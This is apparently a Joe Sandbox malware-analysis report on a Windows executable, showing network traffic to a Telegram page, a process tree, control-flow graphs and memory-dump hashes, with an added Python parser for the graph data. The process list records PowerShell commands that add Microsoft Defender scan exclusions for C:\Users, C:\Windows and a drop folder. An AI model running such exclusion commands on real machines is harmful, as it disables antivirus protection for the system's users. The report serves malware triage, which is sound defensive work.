67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69
                                                                                                                                                                                                                    Data Ascii: "https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Pri


Session ID: 8
Source IP: 192.168.2.4
Source Port: 50013
Destination IP: 149.154.167.99
Destination Port: 443
PID: 7672
Process: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
Timestamp  Bytes transferred  Direction  Data
2024-12-23 08:03:05 UTC  144  OUT  GET /m3wm0w HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
2024-12-23 08:03:06 UTC  368  IN  HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 23 Dec 2024 08:03:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9539
Connection: close
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-23 08:03:06 UTC  9539  IN  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent



Target ID:0
Start time:03:00:11
Start date:23/12/2024
Path:C:\Users\user\Desktop\YYjRtxS70h.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\YYjRtxS70h.exe"
Imagebase:0x950000
File size:13'793'970 bytes
MD5 hash:5A59CE92B07DE68C0BE8FBD7944214E2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:1
Start time:03:00:11
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:2
Start time:03:00:16
Start date:23/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"
Imagebase:0x5c0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:03:00:16
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:03:00:16
Start date:23/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJs
Imagebase:0x5c0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:03:00:28
Start date:23/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Imagebase:0x5c0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:03:00:28
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                    Start time:03:00:29
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
                                                                                                                                                                                                                    Imagebase:0x5c0000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                    Start time:03:00:44
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
                                                                                                                                                                                                                    Imagebase:0x5c0000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                    Start time:03:00:44
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                    Start time:03:00:45
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
                                                                                                                                                                                                                    Imagebase:0x5c0000
                                                                                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                    Start time:03:01:13
                                                                                                                                                                                                                    Start date:23/12/2024
                                                                                                                                                                                                                    Path:C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe"
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    File size:476'160 bytes
                                                                                                                                                                                                                    MD5 hash:F453C5F8C736FF8C381E7022CAD85E3E
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                    • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                    Has exited:false


Execution Graph

Execution Coverage: 22.8%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
execution_graph 2549 2ad1170 2550 2ad11b2 GetConsoleWindow 2549->2550 2551 2ad11f2 2550->2551

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 64 2ad0a40-2ad0a68 65 2ad0a6f-2ad0ac5 call 2ad10e0 call 2ad1317 64->65 66 2ad0a6a 64->66 69 2ad0ad5-2ad0ccc 65->69 70 2ad0ac7-2ad0ad0 65->70 66->65 102 2ad0daf-2ad0dc3 69->102 73 2ad1091-2ad10d6 70->73 103 2ad0dc9-2ad0dde 102->103 104 2ad0cd1-2ad0d17 102->104 107 2ad0e5b-2ad0e77 103->107 108 2ad0d1e-2ad0d51 104->108 109 2ad0d19 104->109 110 2ad0e7d-2ad0e95 107->110 111 2ad0de0-2ad0e1f 107->111 115 2ad0d58-2ad0dac 108->115 116 2ad0d53 108->116 109->108 112 2ad0ede-2ad0f1c call 2ad013c 110->112 113 2ad0e97-2ad0edb 110->113 120 2ad0e26-2ad0e3e 111->120 121 2ad0e21 111->121 132 2ad0f24-2ad0fa2 call 2ad014c 112->132 113->112 115->102 116->115 129 2ad0e46-2ad0e58 120->129 121->120 129->107 139 2ad102e-2ad1036 132->139 140 2ad0fa8-2ad102c 132->140 143 2ad1037-2ad1038 139->143 140->143 143->73
Strings
Memory Dump Source
• Source File: 00000000.00000002.3414898150.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ad0000_YYjRtxS70h.jbxd
Similarity
• API ID:
• String ID: a^q
• API String ID: 0-3411664965
• Opcode ID: cf2e3a6f105cc7f77dfa74734452bcbdcef69bf97b2eb615fdc41e3fc11791b1
• Instruction ID: e30e2aaa21d2e5ab1d363bc3a82a2a700a79a9b8113a9db32d23e32d3f37c2f7
• Opcode Fuzzy Hash: cf2e3a6f105cc7f77dfa74734452bcbdcef69bf97b2eb615fdc41e3fc11791b1
• Instruction Fuzzy Hash: 4612A674A01228CFDB14DFA9C984B9DBBB2FF48301F108559E819AB359DB74A985CF50

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 298 2ad2309-2ad2340 299 2ad2347-2ad23d9 298->299 300 2ad2342 298->300 305 2ad25c8-2ad25d1 299->305 300->299 306 2ad23de-2ad23e7 305->306 307 2ad25d7-2ad25de 305->307 308 2ad23ee-2ad24fb call 2ad19ac call 2ad19bc 306->308 309 2ad23e9 306->309 327 2ad24fd-2ad2518 308->327 328 2ad2525-2ad2540 308->328 309->308 331 2ad2520-2ad2523 327->331 333 2ad2541-2ad255c 328->333 331->333 335 2ad255e 333->335 336 2ad2568 333->336 337 2ad2567 335->337 336->305 337->336
Memory Dump Source
• Source File: 00000000.00000002.3414898150.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ad0000_YYjRtxS70h.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4c3bbb2f452a3efcaf81cb8aaa3e7893a559663649addda28054c4e5c8e973ef
• Instruction ID: f3f71006466d5c7e6265a5a827995c5cfecfd5a143fe11bbc8e9c90cbc90aa2c
• Opcode Fuzzy Hash: 4c3bbb2f452a3efcaf81cb8aaa3e7893a559663649addda28054c4e5c8e973ef
• Instruction Fuzzy Hash: B281F674E01208DFDB18DFA5D590AAEBBB2FF89300F209469D805AB354DB359D46CF50

Control-flow Graph
• Executed
• Not Executed
• Basic blocks: 151: 2ad1168-2ad11aa; 153: 2ad11b2-2ad11f0 (GetConsoleWindow); 154: 2ad11f9-2ad1225; 155: 2ad11f2-2ad11f8
• Edges: 151->153, 153->154, 153->155, 155->154
APIs
• GetConsoleWindow (called from block 153, 2ad11b2-2ad11f0)
Memory Dump Source
• Source File: 00000000.00000002.3414898150.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ad0000_YYjRtxS70h.jbxd
Similarity
• API ID: ConsoleWindow
• String ID:
• API String ID: 2863861424-0
• Opcode ID: 0ba7dc552b4e41b6517dc44875fe89e298d4d759931525974f7b7fd7bda90e86
• Instruction ID: 6cf5158b16ed0972256a52337850be110df54675a1911539b28cffd05c9e92ad
• Opcode Fuzzy Hash: 0ba7dc552b4e41b6517dc44875fe89e298d4d759931525974f7b7fd7bda90e86
• Instruction Fuzzy Hash: D121B9B4D002189FCB00CFA9D984ADEBBF4BB49320F20806AE809B7251D775A945CFA4

Control-flow Graph
• Executed
• Not Executed
• Basic blocks: 158: 2ad1170-2ad11f0 (GetConsoleWindow); 160: 2ad11f9-2ad1225; 161: 2ad11f2-2ad11f8
• Edges: 158->160, 158->161, 161->160
APIs
• GetConsoleWindow (called from block 158, 2ad1170-2ad11f0)
Memory Dump Source
• Source File: 00000000.00000002.3414898150.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2ad0000_YYjRtxS70h.jbxd
Similarity
• API ID: ConsoleWindow
• String ID:
• API String ID: 2863861424-0
• Opcode ID: d7149dd55e2653c40e368aa3363f6cd2e8d20790da29a65dd209e2f90cf5fee9
• Instruction ID: 6325e6aca4f73dc41b65df8df6f558db652a8e70867e2951b73690c0cbde1de7
• Opcode Fuzzy Hash: d7149dd55e2653c40e368aa3363f6cd2e8d20790da29a65dd209e2f90cf5fee9
• Instruction Fuzzy Hash: 2321A9B8D002189FCB00DFA9D984ADEFBF4BB49320F20905AE809B7350C735A945CFA4
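
The `control_flow_graph` lines above are the raw edge lists the Joe Sandbox IDA plugin emits for each function: a node id followed by the block's address range, optional `call <addr>` or API-name annotations for that block, and `src->dst` edges. Below is an added parser for that token stream; it is example code written for this page, not Joe Sandbox code. The grammar it implements is inferred from the three edge lists on this page and is an assumption, as is the rule that the first declared block is the function entry. The sample input is those three edge lists, embedded verbatim. Running it tells you, per function, which block calls GetConsoleWindow (block 153 at 2ad11b2 and block 158 at 2ad1170), which internal functions the first function calls (2ad19ac, 2ad19bc), and that the first function contains a loop closed by the edge 336->305.

```python
"""Parse Joe Sandbox 'control_flow_graph' edge lists into basic blocks, edges,
internal calls and API call sites.

Added example, not Joe Sandbox code. The token grammar is inferred from the
three edge lists on this page and is an ASSUMPTION:
    <node_id> <start>[-<end>] (call <addr> | <ApiName>)*   declares a basic block
    <src>-><dst>                                           declares an edge
The first declared block is taken to be the function entry (also an assumption).
"""
import re
from dataclasses import dataclass, field

# The three edge lists as they appear on this page (copied, not generated here).
CFG_LINES = [
    "control_flow_graph 298 2ad2309-2ad2340 299 2ad2347-2ad23d9 298->299 300 2ad2342 "
    "298->300 305 2ad25c8-2ad25d1 299->305 300->299 306 2ad23de-2ad23e7 305->306 "
    "307 2ad25d7-2ad25de 305->307 308 2ad23ee-2ad24fb call 2ad19ac call 2ad19bc "
    "306->308 309 2ad23e9 306->309 327 2ad24fd-2ad2518 308->327 328 2ad2525-2ad2540 "
    "308->328 331 2ad2520-2ad2523 327->331 333 2ad2541-2ad255c 328->333 331->333 "
    "335 2ad255e 333->335 336 2ad2568 333->336 337 2ad2567 335->337 336->305 337->336",
    "control_flow_graph 151 2ad1168-2ad11aa 153 2ad11b2-2ad11f0 GetConsoleWindow "
    "151->153 154 2ad11f9-2ad1225 153->154 155 2ad11f2-2ad11f8 153->155 155->154",
    "control_flow_graph 158 2ad1170-2ad11f0 GetConsoleWindow 160 2ad11f9-2ad1225 "
    "158->160 161 2ad11f2-2ad11f8 158->161 161->160",
]

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")


@dataclass
class Block:
    node_id: int
    start: int                                  # first instruction address
    end: int                                    # last instruction address (== start for 1-insn blocks)
    calls: list = field(default_factory=list)   # internal call targets (ints)
    apis: list = field(default_factory=list)    # resolved API names called from this block


@dataclass
class Cfg:
    blocks: dict = field(default_factory=dict)  # node_id -> Block, in declaration order
    edges: list = field(default_factory=list)   # (src_node_id, dst_node_id)


def parse_cfg(line):
    tokens = line.split()
    if not tokens or tokens[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    cfg, current, i = Cfg(), None, 1
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:                                   # "src->dst"
            cfg.edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and RANGE_RE.match(tokens[i + 1]):
            lo, _, hi = tokens[i + 1].partition("-")   # "start-end" or bare "start"
            current = Block(int(tok), int(lo, 16), int(hi or lo, 16))
            cfg.blocks[current.node_id] = current
            i += 2
        elif tok == "call" and i + 1 < len(tokens) and current is not None:
            current.calls.append(int(tokens[i + 1], 16))
            i += 2
        elif current is not None:               # any other bare token is an API name
            current.apis.append(tok)
            i += 1
        else:
            raise ValueError(f"unexpected token {tok!r} before first block")
    return cfg


def back_edges(cfg, entry):
    """Edges that close a loop: DFS from entry, report edges to a node still on the DFS stack."""
    succ = {}
    for s, d in cfg.edges:
        succ.setdefault(s, []).append(d)
    visited, on_stack, found = set(), set(), []

    def dfs(n):
        visited.add(n)
        on_stack.add(n)
        for m in succ.get(n, []):
            if m in on_stack:
                found.append((n, m))
            elif m not in visited:
                dfs(m)
        on_stack.discard(n)

    dfs(entry)
    return found


def summarize(line):
    """Compact per-function summary, the kind of row you'd put in a triage table."""
    cfg = parse_cfg(line)
    entry = next(iter(cfg.blocks))
    has_succ = {s for s, _ in cfg.edges}
    return {
        "entry": f"{cfg.blocks[entry].start:x}",
        "blocks": len(cfg.blocks),
        "edges": len(cfg.edges),
        "exits": sorted(n for n in cfg.blocks if n not in has_succ),
        "apis": sorted({a for b in cfg.blocks.values() for a in b.apis}),
        "internal_calls": sorted(f"{c:x}" for b in cfg.blocks.values() for c in b.calls),
        "loop_edges": back_edges(cfg, entry),
    }


def api_call_sites(lines, api):
    """function entry address -> [(block id, block start)] for every block calling `api`."""
    out = {}
    for line in lines:
        cfg = parse_cfg(line)
        entry = cfg.blocks[next(iter(cfg.blocks))].start
        hits = [(b.node_id, f"{b.start:x}") for b in cfg.blocks.values() if api in b.apis]
        if hits:
            out[f"{entry:x}"] = hits
    return out


if __name__ == "__main__":
    for cfg_line in CFG_LINES:
        print(summarize(cfg_line))
    print(api_call_sites(CFG_LINES, "GetConsoleWindow"))
```

The block start addresses it returns are what you would feed to the dump viewer (the `.sdmp` at offset 02AD0000 listed under Memory Dump Source) to land on the exact call site rather than scrolling through the whole function. The back-edge detection is a plain DFS and is only meaningful for the single-entry graphs the plugin emits here; a function with several entry points would need dominator analysis instead.
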

Memory Dump Source
• Source File: 00000000.00000002.3414238029.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_110d000_YYjRtxS70h.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1b58003564442209379355992c7f346cc0b5046478c4b6d3893f99de1f27ae03
• Instruction ID: 1808d7b76786efc7b3c18b63818cbd8039e39e515ab692651a53575e4ec9cc34
• Opcode Fuzzy Hash: 1b58003564442209379355992c7f346cc0b5046478c4b6d3893f99de1f27ae03
• Instruction Fuzzy Hash: D821E571A04204DFDF0ADF98E984B26BF75FB94318F24C569ED090A286C376D416C6A2

Memory Dump Source
• Source File: 00000000.00000002.3414238029.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_110d000_YYjRtxS70h.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction ID: d62ae31a5920a89081ccc32214d64e9e1be26ba97ba0e5138166e6465f307594
• Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
• Instruction Fuzzy Hash: 6611CD76904284CFCF06CF44D5C4B16BF72FB84324F24C6A9DC090A296C336D45ACBA2

Memory Dump Source
• Source File: 00000000.00000002.3414238029.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_110d000_YYjRtxS70h.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e9c753c3cf88ee9514b90af05ed3b29a560b97cdc88a2d1d535d2e09f888dd1d
• Instruction ID: 4fb218c4eb5a366c72c3c452a37542ad994cce72db3be50fa6cad3c0223d7357
• Opcode Fuzzy Hash: e9c753c3cf88ee9514b90af05ed3b29a560b97cdc88a2d1d535d2e09f888dd1d
• Instruction Fuzzy Hash: E901F7718047849AEB2A9AD9DD84B26BFE8DF51329F08C45AED0D0A2C2C7B89840C671

Memory Dump Source
• Source File: 00000000.00000002.3414238029.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_110d000_YYjRtxS70h.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f8f3f173fc1deaf20dc5de9f2492a6f54e8d97e8b6cb1a87ceece0d35c9f5517
• Instruction ID: fbc3138d73a289f9ceaa846f2873838bd5b4ca144c7822eaf00b09145cb8e647
• Opcode Fuzzy Hash: f8f3f173fc1deaf20dc5de9f2492a6f54e8d97e8b6cb1a87ceece0d35c9f5517
• Instruction Fuzzy Hash: 55F0C2714043849EEB258E59DD88B62FF98EB40334F18C05AED0C4B2C6C3789840CA70

Memory Dump Source
• Source File: 00000002.00000002.2029807320.000000000315D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0315D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_315d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 36fb76e657281f5c21157fb550ed596ee0e9dce212e671c437caf9449710a75d
• Instruction ID: be8d082f8bef263aa2e81050a150a28a846e955f46396a520425c70b513c3238
• Opcode Fuzzy Hash: 36fb76e657281f5c21157fb550ed596ee0e9dce212e671c437caf9449710a75d
• Instruction Fuzzy Hash: 3701DF72009340DBE7208B29EC84B66BF98DB59365F1CC45AFC280A286C7789882C7B1

Memory Dump Source
• Source File: 00000002.00000002.2029807320.000000000315D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0315D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_315d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e3c86dedc9f7649f185bf4c545c33b4e358dac87d05a9eb4eb52fbcafa8e887
• Instruction ID: 3a27bf63025635d9dcb276e07031607d9aabfadf5925c2ac92f3381ff092bc0d
• Opcode Fuzzy Hash: 5e3c86dedc9f7649f185bf4c545c33b4e358dac87d05a9eb4eb52fbcafa8e887
• Instruction Fuzzy Hash: 81015E6240E3C09FD7128B259C94B52BFB8DF57225F1D80DBEC988F297C2699845C772

Memory Dump Source
• Source File: 00000002.00000002.2030026328.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_31c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b52442a914de4fe824c0a3c3dfb4aacb27af379eb9269159e598dc165b80915c
• Instruction ID: d3d72f8fd4f01e5bdd50e262d92196ef7e4ececd5261980c2722f16f76dd7c60
• Opcode Fuzzy Hash: b52442a914de4fe824c0a3c3dfb4aacb27af379eb9269159e598dc165b80915c
• Instruction Fuzzy Hash: 10F0D435A001099FCB15CF9DD890AEEF7B1FF88324F248159E529A72A1C736EC52CB60

Memory Dump Source
• Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 071080916b087dc981e9455837648b52ba59bdac1216bafde7ea6f29581567f1
                                                                                                                                                                                                                      • Instruction ID: 071972b6f83312cded62a8397a6fa6d9321045759c2ce9a3a944dccb3a3cd2c2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 071080916b087dc981e9455837648b52ba59bdac1216bafde7ea6f29581567f1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99916171F007295BDB1AEBB588145AFBBE2EF94704B00895DD50A9B380DF746D0B8BC6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2020645403.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2b00000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: a2e32e5f4a4a9795552636ab8ad01d4cca25e42be65cd1cd8c3f0656951ba055
                                                                                                                                                                                                                      • Instruction ID: 43c58a7edc737359d980b4813597fbdc162424b19c447e95eda585328556aa84
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2e32e5f4a4a9795552636ab8ad01d4cca25e42be65cd1cd8c3f0656951ba055
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D915271F007295BDB1AEBB584546AFBAE3EF84704B00895DD50AAB340DF7469078BC6
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2025930122.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$piIk$piIk$piIk$piIk$piIk$|,Kk
                                                                                                                                                                                                                      • API String ID: 0-3823266662
                                                                                                                                                                                                                      • Opcode ID: e01f0ab702d09e0691069a49601f74956199680e83418f32de37549d711b190f
                                                                                                                                                                                                                      • Instruction ID: b24bb6f29c6c282045eaa7acc2a6882a5b9e49c7df6b1d27195936a4f88d3d70
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e01f0ab702d09e0691069a49601f74956199680e83418f32de37549d711b190f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88222631B00315DFDB609B6889457AABBF2AF88315F1484BADA05CF241DB31DE85C7E2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2025930122.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6e70000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                                                                      • API String ID: 0-1420252700
                                                                                                                                                                                                                      • Opcode ID: 1f3ffd03e32af790d3d0c67785f1a5b4e175a44d21a2ce15103a9173ee167ba5
                                                                                                                                                                                                                      • Instruction ID: c2834f61665474a5e658c64bf900f1fa718ac52b986a6746fd5c293605f15266
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f3ffd03e32af790d3d0c67785f1a5b4e175a44d21a2ce15103a9173ee167ba5
